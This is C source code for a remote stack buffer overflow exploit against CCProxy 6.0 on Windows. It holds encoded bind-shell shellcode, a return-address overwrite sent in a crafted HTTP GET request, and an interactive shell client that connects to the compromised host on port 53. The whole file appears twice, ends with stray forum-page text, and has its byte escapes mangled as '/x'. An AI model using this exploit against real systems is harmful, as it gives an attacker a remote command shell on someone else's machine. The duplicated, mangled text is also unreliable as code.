/*
* ccpx.c - x86/win32 CCProxy 6.0 remote stack buffer overflow exploit
* Author : isno <isno@xfocus.org>
* Complie : cl ccpx.c
* Usage : ccpx <target_ip> [target_port]
* default target_port is 808
* Stronger By Goldsun 5261314@sohu.com
*/
#include <stdio.h>
#include <stdlib.h>
#include <Winsock2.h>
#include <windows.h>
#pragma comment (lib,"ws2_32")
#define PPORT 808
#define XPORT 53
//lion's shellcode bind port 53
unsigned char shellcode[] =
"/xEB/x10/x5A/x4A/x33/xC9/x66/xB9/x7D/x01/x80/x34/x0A/x99/xE2/xFA"
"/xEB/x05/xE8/xEB/xFF/xFF/xFF"
// shellcode
"/x70/x95/x98/x99/x99/xC3/xFD/x38/xA9/x99/x99/x99/x12/xD9/x95/x12"
"/xE9/x85/x34/x12/xD9/x91/x12/x41/x12/xEA/xA5/x12/xED/x87/xE1/x9A"
"/x6A/x12/xE7/xB9/x9A/x62/x12/xD7/x8D/xAA/x74/xCF/xCE/xC8/x12/xA6"
"/x9A/x62/x12/x6B/xF3/x97/xC0/x6A/x3F/xED/x91/xC0/xC6/x1A/x5E/x9D"
"/xDC/x7B/x70/xC0/xC6/xC7/x12/x54/x12/xDF/xBD/x9A/x5A/x48/x78/x9A"
"/x58/xAA/x50/xFF/x12/x91/x12/xDF/x85/x9A/x5A/x58/x78/x9B/x9A/x58"
"/x12/x99/x9A/x5A/x12/x63/x12/x6E/x1A/x5F/x97/x12/x49/xF3/x9A/xC0"
"/x71/x1E/x99/x99/x99/x1A/x5F/x94/xCB/xCF/x66/xCE/x65/xC3/x12/x41"
"/xF3/x9C/xC0/x71/xED/x99/x99/x99/xC9/xC9/xC9/xC9/xF3/x98/xF3/x9B"
"/x66/xCE/x75/x12/x41/x5E/x9E/x9B/x99/x99/xAC/xAA/x59/x10/xDE/x9D"
"/xF3/x89/xCE/xCA/x66/xCE/x69/xF3/x98/xCA/x66/xCE/x6D/xC9/xC9/xCA"
"/x66/xCE/x61/x12/x49/x1A/x75/xDD/x12/x6D/xAA/x59/xF3/x89/xC0/x10"
"/x9D/x17/x7B/x62/x10/xCF/xA1/x10/xCF/xA5/x10/xCF/xD9/xFF/x5E/xDF"
"/xB5/x98/x98/x14/xDE/x89/xC9/xCF/xAA/x50/xC8/xC8/xC8/xF3/x98/xC8"
"/xC8/x5E/xDE/xA5/xFA/xF4/xFD/x99/x14/xDE/xA5/xC9/xC8/x66/xCE/x79"
"/xCB/x66/xCE/x65/xCA/x66/xCE/x65/xC9/x66/xCE/x7D/xAA/x59"
"/x35" //port
"/x1C/x59/xEC/x60/xC8/xCB/xCF/xCA/x66/x4B/xC3/xC0/x32/x7B/x77/xAA/x59"
"/x5A/x71/x76/x67/x66/x66/xDE/xFC/xED/xC9/xEB/xF6/xFA/xD8/xFD/xFD"
"/xEB/xFC/xEA/xEA/x99/xDA/xEB/xFC/xF8/xED/xFC/xC9/xEB/xF6/xFA/xFC"
"/xEA/xEA/xD8/x99/xDC/xE1/xF0/xED/xCD/xF1/xEB/xFC/xF8/xFD/x99/xD5"
"/xF6/xF8/xFD/xD5/xF0/xFB/xEB/xF8/xEB/xE0/xD8/x99/xEE/xEA/xAB/xC6"
"/xAA/xAB/x99/xCE/xCA/xD8/xCA/xF6/xFA/xF2/xFC/xED/xD8/x99/xFB/xF0"
"/xF7/xFD/x99/xF5/xF0/xEA/xED/xFC/xF7/x99/xF8/xFA/xFA/xFC/xE9/xED"
"/x99/xFA/xF5/xF6/xEA/xFC/xEA/xF6/xFA/xF2/xFC/xED/x99";
int Make_Connection(char *address,int port,int timeout);
void shell (int sock);
int main(int argc, char * argv[])
{
SOCKET csock, s2;
WSADATA WSAData;
int yn, offset, ret, pport;
char line[80];
char buf[8000], sbuf[10000];
char local[100] = {0};
char *localip;
struct hostent * pHost;
if(argc<2)
{
printf("CCPROXY 6 Exploit CN Writen By isno@xfocus.org & Compiled By Goldsun/n");
printf("Usage: %s <target_ip> [target_port] [offset]/ndefault port is 808/n", argv[0]);
return 1;
}
if(argc>=3)
pport=atoi(argv[2]);
else
pport=PPORT;
if(argc>=4)offset=atoi(argv[3]);
if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
{
printf("[-] WSAStartup failed./n");
WSACleanup();
exit(1);
}
// 获取本机名
gethostname((char*)local, sizeof(local)-1);
// 获取本地 IP 地址
pHost = gethostbyname((char*)local);
localip = inet_ntoa(*(IN_ADDR *)pHost->h_addr_list[0]);
//offset=15-strlen(localip); //offset from target_ip len ret addr
offset=2;
printf("Local IP: %s Target IP: %s:%d/n",localip,argv[1],pport);
printf("Target in the same subnet? [y/n] ");
yn = _getch();
if(yn == 0x6e || yn == 0x4e)
{
printf("/r/nHave real Internet Ip Address ? [y/n] ");
yn = _getch();
if(yn == 0x6e || yn == 0x4e)
{
printf("/r/nYour gateway Internet ip address: ");
gets(line);
offset=15-strlen(line);
}
}
//如果攻击目标为本地地址,则需要调整offset
if(strcmp(argv[1], "localhost") == 0 || strcmp(argv[1], "127.0.0.1") == 0)
//offset=15-strlen("127.0.0.1");
offset=6;
printf("/r/n[+] connecting to %s:%d/n", argv[1], pport);
csock = Make_Connection(argv[1], pport, 10);
if(csock<0)
{
printf("[-] connect err./n");
exit(1);
}
printf("Offset: %d",offset);
memset(buf, 0, sizeof(buf)-1);
memset(buf, 0x41, 4045+offset);
memcpy(buf+strlen(buf)-strlen(shellcode), shellcode, strlen(shellcode));
printf(" Magic Length: %d + 16 =",strlen(buf));
strcat(buf, "/xcd/x54/xfa/x7f"); //ret addr jmp esp
strcat(buf, "/xb9/x41/x41/x41/x25/xc1/xe9/x14/x2b/xe1/xff/xe4"); //jmp back
sprintf(sbuf, "GET /%s HTTP/1.0/r/n/r/n", buf);
printf(" buffer length: %d/n",strlen(buf));
printf("[+] send magic buffer.../n");
ret=send(csock, sbuf,strlen(sbuf), 0);
if(ret<=0)
{
printf("[-] send err./n");
exit(1);
}
closesocket(csock);
Sleep(1000);
printf("[+] connecting to CMD shell port.../n");
s2 = Make_Connection(argv[1], XPORT, 10);
if(s2<0)
{
printf("[-] connect err:-<maybe there's firewall/n");
exit(1);
}
shell(s2);
WSACleanup();
return 0;
}
// 解析域名
unsigned int resolve(char *name)
{
struct hostent *he;
unsigned int ip;
if((ip=inet_addr(name))==(-1))
{
if((he=gethostbyname(name))==0)
return 0;
memcpy(&ip,he->h_addr,4);
}
return ip;
}
// 建立TCP连接
// 输入:
// char * address IP地址
// int port 端口
// int timeout 延时
// 输出:
// 返回:
// 成功 >0
// 错误 <=0
int Make_Connection(char *address,int port,int timeout)
{
struct sockaddr_in target;
SOCKET s;
int i;
DWORD bf;
fd_set wd;
struct timeval tv;
s = socket(AF_INET,SOCK_STREAM,0);
if(s<0)
return -1;
target.sin_family = AF_INET;
target.sin_addr.s_addr = resolve(address);
if(target.sin_addr.s_addr==0)
{
closesocket(s);
return -2;
}
target.sin_port = htons(port);
bf = 1;
ioctlsocket(s,FIONBIO,&bf);
tv.tv_sec = timeout;
tv.tv_usec = 0;
FD_ZERO(&wd);
FD_SET(s,&wd);
connect(s,(struct sockaddr *)&target,sizeof(target));
if((i=select(s+1,0,&wd,0,&tv))==(-1))
{
closesocket(s);
return -3;
}
if(i==0)
{
closesocket(s);
return -4;
}
i = sizeof(int);
getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);
if((bf!=0)||(i!=sizeof(int)))
{
closesocket(s);
return -5;
}
ioctlsocket(s,FIONBIO,&bf);
return s;
}
/* ripped from TESO code and modifed by ey4s for win32 */
void shell (int sock)
{
int l;
char buf[512];
struct timeval time;
unsigned long ul[2];
time.tv_sec = 1;
time.tv_usec = 0;
while (1)
{
ul[0] = 1;
ul[1] = sock;
l = select (0, (fd_set *)&ul, NULL, NULL, &time);
if(l == 1)
{
l = recv (sock, buf, sizeof (buf), 0);
if (l <= 0)
{
printf ("[-] Connection closed./n");
return;
}
l = write (1, buf, l);
if (l <= 0)
{
printf ("[-] Connection closed./n");
return;
}
}
else
{
l = read (0, buf, sizeof (buf));
if (l <= 0)
{
printf("[-] Connection closed./n");
return;
}
l = send(sock, buf, l, 0);
if (l <= 0)
{
printf("[-] Connection closed./n");
return;
}
}
}
}
* ccpx.c - x86/win32 CCProxy 6.0 remote stack buffer overflow exploit
* Author : isno <isno@xfocus.org>
* Complie : cl ccpx.c
* Usage : ccpx <target_ip> [target_port]
* default target_port is 808
* Stronger By Goldsun 5261314@sohu.com
*/
#include <stdio.h>
#include <stdlib.h>
#include <Winsock2.h>
#include <windows.h>
#pragma comment (lib,"ws2_32")
#define PPORT 808
#define XPORT 53
//lion's shellcode bind port 53
unsigned char shellcode[] =
"/xEB/x10/x5A/x4A/x33/xC9/x66/xB9/x7D/x01/x80/x34/x0A/x99/xE2/xFA"
"/xEB/x05/xE8/xEB/xFF/xFF/xFF"
// shellcode
"/x70/x95/x98/x99/x99/xC3/xFD/x38/xA9/x99/x99/x99/x12/xD9/x95/x12"
"/xE9/x85/x34/x12/xD9/x91/x12/x41/x12/xEA/xA5/x12/xED/x87/xE1/x9A"
"/x6A/x12/xE7/xB9/x9A/x62/x12/xD7/x8D/xAA/x74/xCF/xCE/xC8/x12/xA6"
"/x9A/x62/x12/x6B/xF3/x97/xC0/x6A/x3F/xED/x91/xC0/xC6/x1A/x5E/x9D"
"/xDC/x7B/x70/xC0/xC6/xC7/x12/x54/x12/xDF/xBD/x9A/x5A/x48/x78/x9A"
"/x58/xAA/x50/xFF/x12/x91/x12/xDF/x85/x9A/x5A/x58/x78/x9B/x9A/x58"
"/x12/x99/x9A/x5A/x12/x63/x12/x6E/x1A/x5F/x97/x12/x49/xF3/x9A/xC0"
"/x71/x1E/x99/x99/x99/x1A/x5F/x94/xCB/xCF/x66/xCE/x65/xC3/x12/x41"
"/xF3/x9C/xC0/x71/xED/x99/x99/x99/xC9/xC9/xC9/xC9/xF3/x98/xF3/x9B"
"/x66/xCE/x75/x12/x41/x5E/x9E/x9B/x99/x99/xAC/xAA/x59/x10/xDE/x9D"
"/xF3/x89/xCE/xCA/x66/xCE/x69/xF3/x98/xCA/x66/xCE/x6D/xC9/xC9/xCA"
"/x66/xCE/x61/x12/x49/x1A/x75/xDD/x12/x6D/xAA/x59/xF3/x89/xC0/x10"
"/x9D/x17/x7B/x62/x10/xCF/xA1/x10/xCF/xA5/x10/xCF/xD9/xFF/x5E/xDF"
"/xB5/x98/x98/x14/xDE/x89/xC9/xCF/xAA/x50/xC8/xC8/xC8/xF3/x98/xC8"
"/xC8/x5E/xDE/xA5/xFA/xF4/xFD/x99/x14/xDE/xA5/xC9/xC8/x66/xCE/x79"
"/xCB/x66/xCE/x65/xCA/x66/xCE/x65/xC9/x66/xCE/x7D/xAA/x59"
"/x35" //port
"/x1C/x59/xEC/x60/xC8/xCB/xCF/xCA/x66/x4B/xC3/xC0/x32/x7B/x77/xAA/x59"
"/x5A/x71/x76/x67/x66/x66/xDE/xFC/xED/xC9/xEB/xF6/xFA/xD8/xFD/xFD"
"/xEB/xFC/xEA/xEA/x99/xDA/xEB/xFC/xF8/xED/xFC/xC9/xEB/xF6/xFA/xFC"
"/xEA/xEA/xD8/x99/xDC/xE1/xF0/xED/xCD/xF1/xEB/xFC/xF8/xFD/x99/xD5"
"/xF6/xF8/xFD/xD5/xF0/xFB/xEB/xF8/xEB/xE0/xD8/x99/xEE/xEA/xAB/xC6"
"/xAA/xAB/x99/xCE/xCA/xD8/xCA/xF6/xFA/xF2/xFC/xED/xD8/x99/xFB/xF0"
"/xF7/xFD/x99/xF5/xF0/xEA/xED/xFC/xF7/x99/xF8/xFA/xFA/xFC/xE9/xED"
"/x99/xFA/xF5/xF6/xEA/xFC/xEA/xF6/xFA/xF2/xFC/xED/x99";
int Make_Connection(char *address,int port,int timeout);
void shell (int sock);
int main(int argc, char * argv[])
{
SOCKET csock, s2;
WSADATA WSAData;
int yn, offset, ret, pport;
char line[80];
char buf[8000], sbuf[10000];
char local[100] = {0};
char *localip;
struct hostent * pHost;
if(argc<2)
{
printf("CCPROXY 6 Exploit CN Writen By isno@xfocus.org & Compiled By Goldsun/n");
printf("Usage: %s <target_ip> [target_port] [offset]/ndefault port is 808/n", argv[0]);
return 1;
}
if(argc>=3)
pport=atoi(argv[2]);
else
pport=PPORT;
if(argc>=4)offset=atoi(argv[3]);
if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
{
printf("[-] WSAStartup failed./n");
WSACleanup();
exit(1);
}
// 获取本机名
gethostname((char*)local, sizeof(local)-1);
// 获取本地 IP 地址
pHost = gethostbyname((char*)local);
localip = inet_ntoa(*(IN_ADDR *)pHost->h_addr_list[0]);
//offset=15-strlen(localip); //offset from target_ip len ret addr
offset=2;
printf("Local IP: %s Target IP: %s:%d/n",localip,argv[1],pport);
printf("Target in the same subnet? [y/n] ");
yn = _getch();
if(yn == 0x6e || yn == 0x4e)
{
printf("/r/nHave real Internet Ip Address ? [y/n] ");
yn = _getch();
if(yn == 0x6e || yn == 0x4e)
{
printf("/r/nYour gateway Internet ip address: ");
gets(line);
offset=15-strlen(line);
}
}
//如果攻击目标为本地地址,则需要调整offset
if(strcmp(argv[1], "localhost") == 0 || strcmp(argv[1], "127.0.0.1") == 0)
//offset=15-strlen("127.0.0.1");
offset=6;
printf("/r/n[+] connecting to %s:%d/n", argv[1], pport);
csock = Make_Connection(argv[1], pport, 10);
if(csock<0)
{
printf("[-] connect err./n");
exit(1);
}
printf("Offset: %d",offset);
memset(buf, 0, sizeof(buf)-1);
memset(buf, 0x41, 4045+offset);
memcpy(buf+strlen(buf)-strlen(shellcode), shellcode, strlen(shellcode));
printf(" Magic Length: %d + 16 =",strlen(buf));
strcat(buf, "/xcd/x54/xfa/x7f"); //ret addr jmp esp
strcat(buf, "/xb9/x41/x41/x41/x25/xc1/xe9/x14/x2b/xe1/xff/xe4"); //jmp back
sprintf(sbuf, "GET /%s HTTP/1.0/r/n/r/n", buf);
printf(" buffer length: %d/n",strlen(buf));
printf("[+] send magic buffer.../n");
ret=send(csock, sbuf,strlen(sbuf), 0);
if(ret<=0)
{
printf("[-] send err./n");
exit(1);
}
closesocket(csock);
Sleep(1000);
printf("[+] connecting to CMD shell port.../n");
s2 = Make_Connection(argv[1], XPORT, 10);
if(s2<0)
{
printf("[-] connect err:-<maybe there's firewall/n");
exit(1);
}
shell(s2);
WSACleanup();
return 0;
}
// 解析域名
unsigned int resolve(char *name)
{
struct hostent *he;
unsigned int ip;
if((ip=inet_addr(name))==(-1))
{
if((he=gethostbyname(name))==0)
return 0;
memcpy(&ip,he->h_addr,4);
}
return ip;
}
// 建立TCP连接
// 输入:
// char * address IP地址
// int port 端口
// int timeout 延时
// 输出:
// 返回:
// 成功 >0
// 错误 <=0
int Make_Connection(char *address,int port,int timeout)
{
struct sockaddr_in target;
SOCKET s;
int i;
DWORD bf;
fd_set wd;
struct timeval tv;
s = socket(AF_INET,SOCK_STREAM,0);
if(s<0)
return -1;
target.sin_family = AF_INET;
target.sin_addr.s_addr = resolve(address);
if(target.sin_addr.s_addr==0)
{
closesocket(s);
return -2;
}
target.sin_port = htons(port);
bf = 1;
ioctlsocket(s,FIONBIO,&bf);
tv.tv_sec = timeout;
tv.tv_usec = 0;
FD_ZERO(&wd);
FD_SET(s,&wd);
connect(s,(struct sockaddr *)&target,sizeof(target));
if((i=select(s+1,0,&wd,0,&tv))==(-1))
{
closesocket(s);
return -3;
}
if(i==0)
{
closesocket(s);
return -4;
}
i = sizeof(int);
getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);
if((bf!=0)||(i!=sizeof(int)))
{
closesocket(s);
return -5;
}
ioctlsocket(s,FIONBIO,&bf);
return s;
}
/* ripped from TESO code and modifed by ey4s for win32 */
void shell (int sock)
{
int l;
char buf[512];
struct timeval time;
unsigned long ul[2];
time.tv_sec = 1;
time.tv_usec = 0;
while (1)
{
ul[0] = 1;
ul[1] = sock;
l = select (0, (fd_set *)&ul, NULL, NULL, &time);
if(l == 1)
{
l = recv (sock, buf, sizeof (buf), 0);
if (l <= 0)
{
printf ("[-] Connection closed./n");
return;
}
l = write (1, buf, l);
if (l <= 0)
{
printf ("[-] Connection closed./n");
return;
}
}
else
{
l = read (0, buf, sizeof (buf));
if (l <= 0)
{
printf("[-] Connection closed./n");
return;
}
l = send(sock, buf, l, 0);
if (l <= 0)
{
printf("[-] Connection closed./n");
return;
}
}
}
}
7798
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
